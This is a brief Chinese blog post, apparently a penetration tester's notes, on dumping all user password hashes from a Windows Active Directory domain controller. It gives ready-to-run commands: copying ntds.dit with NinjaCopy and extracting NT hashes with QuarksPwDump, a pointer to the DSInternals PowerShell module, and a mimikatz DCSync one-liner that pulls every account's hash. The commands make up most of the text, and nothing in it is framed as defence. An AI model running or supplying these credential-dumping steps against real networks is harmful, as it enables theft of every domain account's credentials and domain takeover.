转储Active Directory数据库
2024-09-20 07:53:16
获取Windows域控所有用户hash:
参考:3gstudent
方法1:
复制ntds.dit:
使用NinjaCopy,https://github.com/3gstudent/NinjaCopy
导出hash:
使用quarkspwdump,https://github.com/quarkslab/quarkspwdump
esentutl /p /o ntds.dit
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
方法2:
使用powershell:DSInternals PowerShell Module
https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip
适用条件:
Windows PowerShell 3.0 or 3.0+
.NET Framework 4.0 or 4.0+
方法3:
mimikatz:
mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"
最新文章
- java中关键字volatile的作用
- Sybase 常用SQL
- Linux 搭建Java web服务器
- Lambda GroupBy Sum
- js-JavaScript高级程序设计学习笔记17
- document.referrer 特性
- 使用JSONP跨域请求数据
- Leetcode#137 Single Number II
- list转换成DataTable
- bzoj 1602 [Usaco2008 Oct]牧场行走(LCA模板)
- C++ 的多重继承
- HDU 4777 Rabbit Kingdom
- 3408: [Usaco2009 Oct]Heat Wave 热浪
- centos7使用kubeadm安装部署kubernetes 1.14
- JAVA ==号和equals()的区别
- Android内存优化(一)Dalvik虚拟机和ART虚拟机对比
- Unity 琐碎(2): Shader 颜色调试
- 各种缓存(Memcached、Redis、RabbitMQ、SQLlchemy)
- 回到未来123Back To The Future
- Win7系统中MySQL服务无法启动的解决方法